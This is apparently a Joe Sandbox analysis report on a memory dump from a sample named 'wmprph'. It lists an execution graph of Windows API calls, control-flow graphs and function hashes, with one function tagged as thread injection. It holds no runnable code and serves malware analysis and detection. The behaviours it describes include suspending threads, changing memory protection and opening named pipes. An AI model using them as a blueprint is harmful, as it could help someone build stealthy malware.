                                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:26
                                                                                                                                                                                                                                                                                                              execution_graph 21922 242c8c0d004 21923 242c8c0d057 21922->21923 21930 242c8c0aef0 21923->21930 21925 242c8c0d07f CreateNamedPipeW 21926 242c8c0d0c7 21925->21926 21929 242c8c0d109 21925->21929 21927 242c8c0d0e0 BindIoCompletionCallback 21926->21927 21928 242c8c0d0f8 ConnectNamedPipe 21927->21928 21927->21929 21928->21929 21931 242c8c0af2c 21930->21931 21934 242c8c12e84 21931->21934 21933 242c8c0af34 21933->21925 21935 242c8c12eb2 21934->21935 21936 242c8c12e98 NtAcceptConnectPort 21934->21936 21935->21933 21936->21935 22236 242c8c0d944 malloc 21937 242c8c02908 21938 242c8c0295b 21937->21938 21939 242c8c0291a 21937->21939 21939->21938 21940 242c8c0293d ResumeThread 21939->21940 21940->21939 22226 242c8c0e0c8 GetSystemInfo VirtualAlloc 21957 242c8c0698c 21958 242c8c069a6 21957->21958 21959 242c8c069ab LoadLibraryA 21958->21959 21960 242c8c069b0 21958->21960 21959->21960 22237 242c8c05910 28 API calls 21979 242c8c05918 21982 242c8c06c68 21979->21982 21981 242c8c0592a 21983 242c8c06c71 21982->21983 21990 242c8c06d54 21982->21990 21983->21990 21993 242c8c13218 21983->21993 21985 242c8c06d06 21985->21990 22001 242c8c03c88 21985->22001 21987 242c8c06d12 21988 242c8c06d29 SetErrorMode 21987->21988 21989 242c8c06d42 21988->21989 21992 242c8c06d6c 21988->21992 21989->21990 22005 242c8c069ec 21989->22005 21990->21981 21992->21981 21998 242c8c13265 21993->21998 21994 242c8c142a6 21994->21985 21995 242c8c13d5a RtlFormatCurrentUserKeyPath 21996 242c8c13d66 21995->21996 21996->21994 21997 242c8c13eab calloc 21996->21997 21997->21994 21999 242c8c13ed1 21997->21999 21998->21994 21998->21995 21998->21996 21999->21994 22021 242c8c0563c 6 API calls 21999->22021 22002 242c8c03c95 22001->22002 22003 242c8c03cbb 22001->22003 22002->22003 22004 242c8c03c9b RtlAddFunctionTable 22002->22004 22003->21987 22004->22003 22006 242c8c069f5 22005->22006 22019 242c8c06a68 22005->22019 22007 242c8c06acd 22006->22007 22009 242c8c06a21 22006->22009 22045 242c8c1105c 15 API calls 22007->22045 22010 242c8c06a99 22009->22010 22011 242c8c06a3d 22009->22011 22009->22019 22044 242c8c116c8 12 API calls 22010->22044 22013 242c8c06a42 22011->22013 22014 242c8c06a8c 22011->22014 22016 242c8c06a77 22013->22016 22017 242c8c06a47 22013->22017 22043 242c8c11188 15 API calls 22014->22043 22042 242c8c112bc 16 API calls 22016->22042 22017->22019 22022 242c8c0d7c0 22017->22022 22019->21990 22021->21994 22023 242c8c0d7e0 22022->22023 22024 242c8c0d7fb MapViewOfFile 22023->22024 22025 242c8c0d85f CloseHandle 22023->22025 22026 242c8c0d825 22024->22026 22027 242c8c0d92b 22025->22027 22028 242c8c0d871 22025->22028 22026->22025 22067 242c8c0a9d4 22027->22067 22028->22027 22046 242c8c02b54 22028->22046 22032 242c8c0d881 22032->22027 22050 242c8c0e2a8 22032->22050 22036 242c8c0d893 22059 242c8c0d3b4 6 API calls 22036->22059 22038 242c8c0d898 22060 242c8c079a0 22038->22060 22040 242c8c0d8e7 22066 242c8c02ba8 6 API calls 22040->22066 22042->22019 22043->22019 22044->22019 22045->22019 22047 242c8c02b64 22046->22047 22048 242c8c02b6d HeapCreate 22047->22048 22049 242c8c02b86 22047->22049 22048->22049 22049->22032 22051 242c8c0e2c0 22050->22051 22055 242c8c0e30a 22051->22055 22070 242c8c02c24 22051->22070 22053 242c8c0e317 VirtualProtect 22074 242c8c01000 22053->22074 22054 242c8c0d88e 22058 242c8c0e1dc GetSystemInfo VirtualAlloc 22054->22058 22055->22053 22055->22054 22057 242c8c0e344 VirtualProtect 22057->22054 22058->22036 22059->22038 22063 242c8c079ce 22060->22063 22061 242c8c07c40 22061->22040 22062 242c8c0a9d4 free 22062->22061 22063->22061 22065 242c8c07b8e 22063->22065 22083 242c8c077dc 22063->22083 22065->22062 22066->22027 22068 242c8c0a9e7 free 22067->22068 22069 242c8c0a9f8 22067->22069 22068->22068 22068->22069 22069->22019 22071 242c8c02c52 22070->22071 22073 242c8c02cbc 22071->22073 22076 242c8c024c4 22071->22076 22073->22055 22075 242c8c0100c 22074->22075 22075->22057 22079 242c8c022d4 GetSystemInfo 22076->22079 22078 242c8c024cd 22078->22073 22082 242c8c02305 22079->22082 22080 242c8c023cf 22080->22078 22080->22080 22081 242c8c023a4 VirtualAlloc 22081->22080 22081->22082 22082->22080 22082->22081 22084 242c8c07804 22083->22084 22091 242c8c13158 22084->22091 22086 242c8c0782d 22088 242c8c07879 22086->22088 22095 242c8c12ec8 22086->22095 22089 242c8c078bb GetVolumeInformationW 22088->22089 22090 242c8c0790c 22088->22090 22089->22090 22090->22065 22092 242c8c1317b 22091->22092 22094 242c8c13173 22091->22094 22093 242c8c131dc NtAcceptConnectPort 22092->22093 22092->22094 22093->22094 22094->22086 22096 242c8c12f11 22095->22096 22097 242c8c12f67 NtAcceptConnectPort 22096->22097 22098 242c8c12f1b 22096->22098 22097->22098 22098->22088 22099 242c8c0515c 22112 242c8c12a20 22099->22112 22101 242c8c05374 22102 242c8c051b5 22102->22101 22103 242c8c05367 22102->22103 22115 242c8c12dac 22102->22115 22124 242c8c1290c 22103->22124 22109 242c8c052f2 22121 242c8c12ddc 22109->22121 22111 242c8c12dac NtAcceptConnectPort 22111->22109 22113 242c8c12a45 22112->22113 22114 242c8c12a30 NtAcceptConnectPort 22112->22114 22113->22102 22114->22113 22116 242c8c12dbc NtAcceptConnectPort 22115->22116 22117 242c8c05244 22115->22117 22116->22117 22117->22103 22118 242c8c12cac 22117->22118 22119 242c8c05290 22118->22119 22120 242c8c12cbf NtAcceptConnectPort 22118->22120 22119->22109 22119->22111 22120->22119 22122 242c8c12dec NtAcceptConnectPort 22121->22122 22123 242c8c12df0 22121->22123 22122->22123 22123->22103 22125 242c8c1291c NtAcceptConnectPort 22124->22125 22126 242c8c12920 22124->22126 22125->22126 22126->22101 22127 7df47df422cc 22129 7df47df422ee 22127->22129 22128 7df47df4276d 22129->22128 22135 7df47df41290 22129->22135 22133 7df47df42329 22133->22128 22134 7df47df42754 SetTimer 22133->22134 22134->22128 22136 7df47df4129d 22135->22136 22137 7df47df412c3 22135->22137 22136->22137 22138 7df47df412a3 RtlAddFunctionTable 22136->22138 22139 7df47df412c8 22137->22139 22138->22137 22140 7df47df412f7 22139->22140 22141 7df47df412e8 VirtualProtect 22139->22141 22142 7df47df41395 22140->22142 22143 7df47df41371 VirtualProtect 22140->22143 22141->22140 22142->22133 22143->22140 22144 242c8c0cc9c 22145 242c8c0ccba 22144->22145 22158 242c8c0cd34 22144->22158 22146 242c8c0ce5f 22145->22146 22147 242c8c0cce0 22145->22147 22145->22158 22148 242c8c0a7e0 malloc 22146->22148 22149 242c8c0ce2e 22147->22149 22152 242c8c0ccf7 22147->22152 22151 242c8c0ce42 22148->22151 22178 242c8c0a7e0 22149->22178 22155 242c8c0ce93 ReadFile 22151->22155 22153 242c8c0cd2b 22152->22153 22154 242c8c0cded 22152->22154 22152->22158 22153->22158 22159 242c8c0c994 22153->22159 22171 242c8c0bc64 22154->22171 22155->22158 22160 242c8c0cc66 22159->22160 22169 242c8c0c9ce 22159->22169 22160->22158 22161 242c8c0cc4f 22162 242c8c0a9d4 free 22161->22162 22162->22160 22163 242c8c0cbca free 22164 242c8c0cbd5 22163->22164 22164->22161 22187 242c8c0c2d0 22164->22187 22166 242c8c0cbc2 22191 242c8c1e398 free 22166->22191 22169->22160 22169->22163 22169->22164 22169->22166 22182 242c8c1e7e8 free 22169->22182 22183 242c8c1dbcc 22169->22183 22172 242c8c0bd60 22171->22172 22173 242c8c0bc92 22171->22173 22172->22158 22173->22172 22174 242c8c0bcb5 OpenFileMappingW 22173->22174 22174->22172 22175 242c8c0bcd2 MapViewOfFile 22174->22175 22176 242c8c0bd57 CloseHandle 22175->22176 22177 242c8c0bcf0 22175->22177 22176->22172 22177->22176 22179 242c8c0a800 22178->22179 22180 242c8c0a847 22178->22180 22179->22180 22181 242c8c0a86b malloc 22179->22181 22180->22151 22181->22180 22182->22169 22184 242c8c1dbde 22183->22184 22185 242c8c1dbe5 22183->22185 22184->22169 22185->22184 22192 242c8c44c3c 22185->22192 22188 242c8c0c313 22187->22188 22190 242c8c0c87a 22187->22190 22189 242c8c0c7c0 VirtualAlloc 22188->22189 22188->22190 22189->22190 22190->22161 22191->22163 22193 242c8c44c4a 22192->22193 22195 242c8c44c6c 22192->22195 22194 242c8c44c65 free 22193->22194 22193->22195 22194->22195 22195->22184 22234 242c8c02de0 6 API calls 22196 242c8c0cee0 22197 242c8c0cef3 22196->22197 22198 242c8c0cf49 22196->22198 22199 242c8c0a7e0 malloc 22197->22199 22200 242c8c0cf05 22199->22200 22201 242c8c0cf28 ReadFile 22200->22201 22201->22198 22223 242c8c0cf64 CreateNamedPipeW BindIoCompletionCallback ConnectNamedPipe NtAcceptConnectPort 21941 242c8c0bc28 21942 242c8c0bc2d 21941->21942 21944 242c8c0bc56 21941->21944 21945 242c8c0ba4c 21942->21945 21946 242c8c0ba6d 21945->21946 21947 242c8c0bb44 CreateWindowExW 21946->21947 21948 242c8c0bba1 21946->21948 21947->21948 21948->21944 21949 242c8c0262c 21950 242c8c0265f 21949->21950 21952 242c8c02680 Thread32First 21950->21952 21953 242c8c02738 21950->21953 21951 242c8c0288e 21956 242c8c02685 21952->21956 21953->21951 21954 242c8c02771 SuspendThread 21953->21954 21954->21953 21955 242c8c0272f CloseHandle 21955->21953 21956->21955 21961 242c8c074f0 21964 242c8c07528 21961->21964 21962 242c8c07782 21963 242c8c075c3 VirtualFree 21963->21964 21964->21962 21964->21963 22232 242c8c06c30 NtAcceptConnectPort 21965 242c8c0bef0 21966 242c8c0bf19 21965->21966 21967 242c8c0bf47 LoadLibraryA 21966->21967 21968 242c8c0bf29 21966->21968 21967->21968 22222 242c8c117b0 15 API calls 21969 242c8c069b8 21970 242c8c069d4 21969->21970 21971 242c8c069e2 21970->21971 21972 242c8c069d9 GetProcAddressForCaller 21970->21972 21972->21971 21973 242c8c02978 21974 242c8c029a6 VirtualProtect 21973->21974 21975 242c8c0299e 21973->21975 21977 242c8c029cb 21974->21977 21978 242c8c029c1 21974->21978 21975->21974 21976 242c8c02a0d VirtualProtect 21976->21978 21977->21976 22218 242c8c06e3a free 22202 242c8c184c0 SetErrorMode 22203 242c8c184d4 22202->22203 22204 242c8c1b936 socket 22203->22204 22205 242c8c1b9c3 socket 22204->22205 22206 242c8c1b97a getsockopt 22204->22206 22208 242c8c1b9e3 22205->22208 22206->22205 22209 242c8c12d80 22210 242c8c12d90 NtAcceptConnectPort 22209->22210 22211 242c8c12d9f 22209->22211 22210->22211

                                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                                              Function 00000242C8C13218 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1263COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 0 242c8c13218-242c8c13274 call 242c8c049e4 3 242c8c142bb-242c8c142e1 call 242c8c149f0 0->3 4 242c8c1327a-242c8c132db call 242c8c06dfc * 3 call 242c8c032fc call 242c8c06dfc 0->4 18 242c8c142a8-242c8c142a9 4->18 19 242c8c132e1-242c8c13bf4 4->19 20 242c8c142ad-242c8c142b6 call 242c8c04a40 18->20 21 242c8c13d49-242c8c13d51 19->21 22 242c8c13bfa-242c8c13c05 19->22 20->3 24 242c8c13d53-242c8c13d58 21->24 25 242c8c13dc4-242c8c13dd5 21->25 22->21 26 242c8c13c0b-242c8c13c19 22->26 24->25 30 242c8c13d5a-242c8c13d64 RtlFormatCurrentUserKeyPath 24->30 28 242c8c13dd7-242c8c13def 25->28 29 242c8c13e2e-242c8c13e34 25->29 31 242c8c13d44-242c8c13d45 26->31 32 242c8c13c1f-242c8c13c27 26->32 28->29 48 242c8c13df1-242c8c13df9 28->48 34 242c8c13e36-242c8c13e37 29->34 35 242c8c13e5f-242c8c13e72 29->35 30->25 33 242c8c13d66-242c8c13d77 30->33 31->21 32->31 36 242c8c13c2d-242c8c13c45 32->36 38 242c8c13d92-242c8c13d9a 33->38 39 242c8c13d79-242c8c13d85 33->39 40 242c8c13e39-242c8c13e58 34->40 35->18 51 242c8c13e78-242c8c13e83 35->51 41 242c8c13d38-242c8c13d3c 36->41 42 242c8c13c4b-242c8c13c4c 36->42 43 242c8c13d9c-242c8c13db8 call 242c8c01000 38->43 60 242c8c13d87-242c8c13d90 39->60 61 242c8c13dbb-242c8c13dbc 39->61 40->40 44 242c8c13e5a-242c8c13e5b 40->44 47 242c8c13d3e-242c8c13d3f 41->47 45 242c8c13c4f-242c8c13c5f 42->45 43->61 44->35 50 242c8c13c71-242c8c13c73 45->50 47->31 52 242c8c13e0b 48->52 53 242c8c13dfb-242c8c13e09 48->53 56 242c8c13c75-242c8c13c7a 50->56 57 242c8c13c61-242c8c13c6f 50->57 51->18 58 242c8c13e89-242c8c13e97 51->58 52->29 59 242c8c13e0d-242c8c13e28 52->59 53->29 62 242c8c13d05-242c8c13d08 56->62 63 242c8c13c80 56->63 57->50 58->18 64 242c8c13e9d-242c8c13ea5 58->64 59->29 60->43 61->25 65 242c8c13d15-242c8c13d24 62->65 66 242c8c13d0a-242c8c13d0e 62->66 67 242c8c13c82-242c8c13c89 63->67 64->18 68 242c8c13eab-242c8c13ecb calloc 64->68 65->45 70 242c8c13d2a-242c8c13d36 65->70 66->65 69 242c8c13d10-242c8c13d11 66->69 71 242c8c13ca3-242c8c13ccf 67->71 72 242c8c13c8b-242c8c13c9f 67->72 68->18 73 242c8c13ed1-242c8c13ef5 68->73 69->65 70->47 75 242c8c13cf7-242c8c13cf8 71->75 76 242c8c13cd1-242c8c13ce5 call 242c8c14a1c 71->76 72->67 74 242c8c13ca1 72->74 77 242c8c14014-242c8c1404f 73->77 78 242c8c13efb-242c8c13f0e 73->78 74->62 81 242c8c13cfd-242c8c13cfe 75->81 76->75 88 242c8c13ce7-242c8c13cf5 76->88 86 242c8c140a7-242c8c140b7 77->86 87 242c8c14051-242c8c14052 77->87 80 242c8c13f10-242c8c13f1a 78->80 83 242c8c13fe5-242c8c13ff7 80->83 84 242c8c13f20-242c8c13f24 80->84 81->62 83->80 89 242c8c13ffd-242c8c14012 83->89 84->83 90 242c8c13f2a-242c8c13f74 call 242c8c14a30 84->90 86->18 99 242c8c140bd-242c8c140d3 86->99 91 242c8c14054-242c8c1405c 87->91 88->81 89->77 100 242c8c13f88-242c8c13f8a 90->100 93 242c8c14089-242c8c1409d 91->93 94 242c8c1405e-242c8c14063 91->94 93->91 98 242c8c1409f-242c8c140a0 93->98 94->93 97 242c8c14065-242c8c1406e 94->97 103 242c8c14071-242c8c14074 97->103 98->86 104 242c8c140d5-242c8c140d6 99->104 105 242c8c14149-242c8c1414f 99->105 101 242c8c13f76-242c8c13f86 100->101 102 242c8c13f8c-242c8c13fa2 100->102 101->100 106 242c8c13fa4-242c8c13fac 102->106 107 242c8c13fe1 102->107 108 242c8c14076 103->108 109 242c8c1407d-242c8c14087 103->109 112 242c8c140d8-242c8c140e3 104->112 110 242c8c141a2-242c8c141a9 105->110 111 242c8c14151-242c8c14155 105->111 106->107 115 242c8c13fae 106->115 107->83 108->109 109->93 109->103 113 242c8c14256-242c8c14258 110->113 114 242c8c141af-242c8c141cf call 242c8c032fc 110->114 116 242c8c1415c-242c8c14167 111->116 117 242c8c140e5-242c8c140f2 112->117 118 242c8c140f4-242c8c14108 112->118 122 242c8c14284-242c8c1428d 113->122 123 242c8c1425a-242c8c14264 113->123 133 242c8c141e4-242c8c141f8 call 242c8c032fc 114->133 134 242c8c141d1-242c8c141e2 call 242c8c035b8 114->134 121 242c8c13fb0-242c8c13fc9 call 242c8c14a1c 115->121 124 242c8c14189-242c8c141a0 116->124 125 242c8c14169-242c8c14175 116->125 117->118 132 242c8c1410c-242c8c1411b 117->132 118->105 120 242c8c1410a 118->120 120->112 141 242c8c13fd5-242c8c13fdb 121->141 142 242c8c13fcb-242c8c13fd1 121->142 122->20 130 242c8c1428f-242c8c142a6 call 242c8c06e0c call 242c8c0563c 122->130 123->122 129 242c8c14266-242c8c14280 123->129 124->110 124->116 125->124 131 242c8c14177-242c8c1417e 125->131 129->122 130->20 131->124 137 242c8c14180-242c8c14187 131->137 138 242c8c1411d-242c8c1413a 132->138 139 242c8c1413c 132->139 133->113 152 242c8c141fa-242c8c1420b call 242c8c035b8 133->152 134->133 151 242c8c1420d-242c8c14223 call 242c8c12804 134->151 137->124 147 242c8c14141-242c8c14143 138->147 139->147 141->107 142->121 146 242c8c13fd3 142->146 146->107 147->105 147->122 151->113 158 242c8c14225-242c8c14235 151->158 152->113 152->151 158->113 160 242c8c14237-242c8c14250 158->160 160->113
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CurrentFormatPathUsercalloc
                                                                                                                                                                                                                                                                                                              • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                                                                                                                                                                                                              • API String ID: 4207655178-84560671
                                                                                                                                                                                                                                                                                                              • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                                                                                                                                                                              • Instruction ID: e3d04d5668d997d804b1dab86e6c5a97543d9851ff20cc7cfb8d71f1783798ea
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9A29E70518B888FD375DF18D8887AAB7E4FB99702F504A2FE48EC3251DB749549CB82
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0D004 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2502124517-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                                                                                                                                                                              • Instruction ID: 307ad9191bc7000d8047ed60fb3d5ffaa6eb4be0f38b923f66877e9e03c6e5ef
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8316070208A088FE795EF28D8D87AA77E5FB94322F51472AE45BC21D1DF74C949CB81
                                                                                                                                                                                                                                                                                                              Function 00000242CA781F40 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 661COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000003.2681738502.00000242CA780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242CA780000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_3_242ca780000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                              • String ID: c
                                                                                                                                                                                                                                                                                                              • API String ID: 1263568516-112844655
                                                                                                                                                                                                                                                                                                              • Opcode ID: 83730d8e1ac888e5b931a51c0679d54f9ee56ffda02ac71e59fb1e1b8d2a9995
                                                                                                                                                                                                                                                                                                              • Instruction ID: c422a37bbaaeb54542fba2daceef22c241025db7b605aededfd47f7608922075
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83730d8e1ac888e5b931a51c0679d54f9ee56ffda02ac71e59fb1e1b8d2a9995
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B72204306486548FDB68DA1DC88977DB7D1FF85302F6441AEE8EBC2243DA34D94ACB81
                                                                                                                                                                                                                                                                                                              Function 00000242C8C13158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 260 242c8c13158-242c8c13171 261 242c8c13173-242c8c13176 260->261 262 242c8c1317b-242c8c1317e 260->262 263 242c8c1320e-242c8c13216 261->263 264 242c8c1318a-242c8c1319f 262->264 265 242c8c13180-242c8c13185 262->265 266 242c8c131ab-242c8c131da 264->266 267 242c8c131a1-242c8c131a5 264->267 265->263 268 242c8c131ea 266->268 269 242c8c131dc-242c8c131e8 NtAcceptConnectPort 266->269 267->266 270 242c8c131ef-242c8c131f1 268->270 269->270 271 242c8c131f3-242c8c131fd 270->271 272 242c8c1320c 270->272 273 242c8c13205 271->273 274 242c8c131ff-242c8c13203 271->274 272->263 275 242c8c1320a 273->275 274->275 275->272
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                              • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                                                                                                                                                                              • Instruction ID: d4e51313d70c9d90c57e7ca01f18b87c7f7822cb743dc43bfadb587a3dedec1f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2121A4717049488FE794AE6ACCC873D76E0EBA9306FA1453FF519C3250D629CA4C8741
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0262C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 277 242c8c0262c-242c8c02666 call 242c8c4342c 280 242c8c02738-242c8c0273b 277->280 281 242c8c0266c-242c8c02680 call 242c8c43426 Thread32First 277->281 283 242c8c0288e-242c8c028a1 280->283 284 242c8c02741-242c8c02749 280->284 287 242c8c02685-242c8c0268a 281->287 284->283 286 242c8c0274f-242c8c02750 284->286 288 242c8c02752-242c8c0276b 286->288 289 242c8c02716-242c8c02729 call 242c8c43420 287->289 290 242c8c02690-242c8c0269a 287->290 293 242c8c0287e-242c8c02888 288->293 294 242c8c02771-242c8c02788 SuspendThread 288->294 289->287 298 242c8c0272f-242c8c02732 CloseHandle 289->298 290->289 297 242c8c0269c-242c8c026a6 290->297 293->283 293->288 299 242c8c02796-242c8c02798 294->299 297->289 305 242c8c026a8-242c8c026ae 297->305 298->280 300 242c8c02873-242c8c0287c 299->300 301 242c8c0279e-242c8c027a2 299->301 300->293 303 242c8c027a4-242c8c027ae 301->303 304 242c8c027b0-242c8c027b1 301->304 306 242c8c027b4-242c8c027b6 303->306 304->306 308 242c8c026d6-242c8c026dc 305->308 309 242c8c026b0-242c8c026d2 305->309 306->300 312 242c8c027bc-242c8c027d2 306->312 310 242c8c02705-242c8c02712 308->310 311 242c8c026de-242c8c026f8 308->311 309->298 315 242c8c026d4 309->315 310->289 311->298 319 242c8c026fa-242c8c02702 311->319 314 242c8c027d4-242c8c027e5 312->314 317 242c8c027e7-242c8c027ea 314->317 318 242c8c027fe 314->318 315->310 320 242c8c027f7-242c8c027fc 317->320 321 242c8c027ec-242c8c027f5 317->321 322 242c8c02800-242c8c0280a 318->322 319->310 320->322 321->322 323 242c8c02862-242c8c0286a 322->323 324 242c8c0280c-242c8c0280e 322->324 323->314 327 242c8c02870-242c8c02871 323->327 325 242c8c02814-242c8c02821 324->325 326 242c8c028ad-242c8c028b1 324->326 328 242c8c02823-242c8c0282e 325->328 329 242c8c0283d 325->329 330 242c8c028b3-242c8c028bd 326->330 331 242c8c028bf-242c8c028cc 326->331 327->300 332 242c8c028a2-242c8c028ab 328->332 333 242c8c02830-242c8c0283b 328->333 334 242c8c0283f-242c8c02842 329->334 330->331 330->334 335 242c8c028e9-242c8c028ed 331->335 336 242c8c028ce-242c8c028da 331->336 332->334 333->328 333->329 334->323 339 242c8c02844-242c8c0285b 334->339 335->329 340 242c8c028f3-242c8c028f6 335->340 337 242c8c028fb-242c8c02903 336->337 338 242c8c028dc-242c8c028e7 336->338 337->334 338->335 338->336 339->323 340->334
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CloseHandleSuspendThread
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1038686644-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2dadd2018d8da694898c1ba991ee9c39d18334290ceec89e20401199c3fae255
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02912535208A05CBEB6E9B29C8C927D73D1FF45352F95825EE04AC7586CB34DA4ACBC1
                                                                                                                                                                                                                                                                                                              Function 00007DF47DF422CC Relevance: 2.0, APIs: 1, Instructions: 450timeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
